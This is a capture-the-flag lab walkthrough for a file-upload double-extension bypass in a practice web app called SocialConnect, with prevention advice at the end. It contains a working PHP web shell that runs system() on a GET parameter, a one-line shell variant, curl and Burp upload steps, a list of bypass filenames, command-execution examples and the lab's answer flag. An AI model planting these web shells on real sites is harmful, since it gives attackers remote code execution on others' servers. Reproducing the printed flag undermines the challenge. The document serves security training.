Avatar

Labs / File Upload Bypass

  • Daily Challenge
  • Released 07 Aug 2025
The lab needs to be started first.
Need help to start?
Daily Challenge

File Upload Bypass - Complete Solution Walkthrough

Understanding the Vulnerability

The SocialConnect platform has a flawed file validation mechanism in the avatar upload functionality. The code checks if the filename contains .png or .jpg anywhere in the name, rather than checking if it ends with these extensions. This allows double extensions like .png.php or .jpg.php to bypass the filter.

Step 1: Account Registration and Setup

  1. Access the application: Navigate to <target-ip> to access SocialConnect
  2. Register an account: Click 'Register' and create a new user account with any details
  3. Log in: Sign in with your newly created credentials
  4. Navigate to profile: Click 'Profile' in the navigation menu
  5. Examine upload functionality: Note the avatar upload section that accepts PNG and JPG files

Step 2: Creating the Web Shell

  1. Create a PHP web shell: Save this content as shell.png.php
<?php
if(isset($_GET['cmd'])) {
echo "<pre>";
echo "Command: " . htmlspecialchars($_GET['cmd']) . "\n";
echo "Output:\n";
system($_GET['cmd']);
echo "</pre>";
} else {
echo "<h2>Web Shell Active</h2>";
echo "<p>Add ?cmd=COMMAND to execute commands</p>";
echo "<p>Example: ?cmd=cat /home/flag.txt</p>";
echo "<form method='GET'>";
echo "Command: <input type='text' name='cmd' placeholder='cat /home/flag.txt'>";
echo "<input type='submit' value='Execute'>";
echo "</form>";
}
?>
  1. Alternative naming: You can also use avatar.jpg.php or similar double extensions

Step 3: Bypassing Client-Side File Restrictions

The file input has client-side restrictions: accept=".png,.jpg,.jpeg". You need to bypass this to select your .php file.

Method 1: Browser Developer Tools

  1. Open browser developer tools: Right-click on the file input and select "Inspect Element"
  2. Edit the HTML: Remove or modify the accept attribute:
# Original
<input type="file" class="form-control" id="avatar" name="avatar" accept=".png,.jpg,.jpeg" required="">

# Modified (remove accept attribute)
<input type="file" class="form-control" id="avatar" name="avatar" required="">
  1. Select your file: Now you can select your shell.png.php file

Method 2: Rename and Upload

  1. Rename temporarily: Rename shell.png.php to shell.png
  2. Upload the file: Select and upload the renamed file
  3. Intercept request: Use Burp Suite or browser dev tools to modify the filename in the POST request back to shell.png.php

Method 3: cURL Upload

# First, login and get session cookie
curl -c cookies.txt -d "username=youruser&password=yourpass" -X POST <target-ip>/login.php

# Upload the shell directly
curl -b cookies.txt -F "avatar=@shell.png.php" <target-ip>/profile.php

Step 4: Uploading the Web Shell

  1. Upload the shell: Using one of the methods from Step 3, upload your shell.png.php file
  2. Bypass the filter: The server-side validation checks for .png in the filename, which passes because of 'shell.png.php'
  3. Complete upload: Click 'Upload Avatar' to upload the file
  4. Note the filename: The system will rename it to something like avatar_1_1234567890_shell.png.php

Step 5: Accessing the Web Shell

  1. Find your shell: Navigate to <target-ip>/uploads/avatars/
  2. Access uploaded file: Look for your uploaded file (it will have a timestamp and user ID in the name)
  3. Execute the shell: Click on your uploaded .php file or access it directly via URL
  4. Verify shell access: You should see the web shell interface

Step 6: Retrieving the Flag

  1. Execute flag command: Use the web shell to run: cat /home/flag.txt
  2. Alternative commands: Try these if needed:
# Direct flag read
cat /home/flag.txt

# Search for flag files
find / -name "*flag*" 2>/dev/null

# List home directory
ls -la /home/

# Current directory and permissions
pwd && whoami
Flag Location: /home/flag.txt
Flag: b14691a4-8b7f-4eb2-b1c8-8e9c53e36ffa

Alternative Exploitation Methods

Method 1: Different Double Extensions

shell.jpg.php
avatar.png.php
image.jpeg.php
profile.jpg.php5

Method 2: Simple Command Shell

Filename: cmd.png.php
Content:
<?php system($_GET['c']); ?>

Usage: cmd.png.php?c=cat /home/flag.txt

Understanding the Vulnerability Code

The vulnerable code in profile.php:

$allowedExtensions = ['png', 'jpg', 'jpeg'];
$hasValidExtension = false;

foreach ($allowedExtensions as $ext) {
if (strpos(strtolower($fileName), '.' . $ext) !== false) {
$hasValidExtension = true;
break;
}
}

The flaw: strpos() checks if .png/.jpg appears anywhere in the filename, not just at the end. This allows files like 'shell.png.php' to pass validation.

Prevention Strategies

  • Proper extension validation: Use pathinfo() or check file ends with allowed extensions
  • MIME type checking: Validate file content type headers
  • File content analysis: Check file magic bytes/signatures
  • Disable script execution: Configure web server to not execute scripts in upload directories
  • Store outside web root: Keep uploaded files outside publicly accessible directories
  • File renaming: Always rename uploaded files to remove original extensions

Challenge Summary

This file upload bypass challenge demonstrates a common but critical vulnerability in web applications. By exploiting inadequate file validation, attackers can upload web shells and gain remote code execution capabilities. The double extension technique shown here is frequently encountered in real-world penetration testing scenarios and highlights the importance of implementing robust file upload security measures.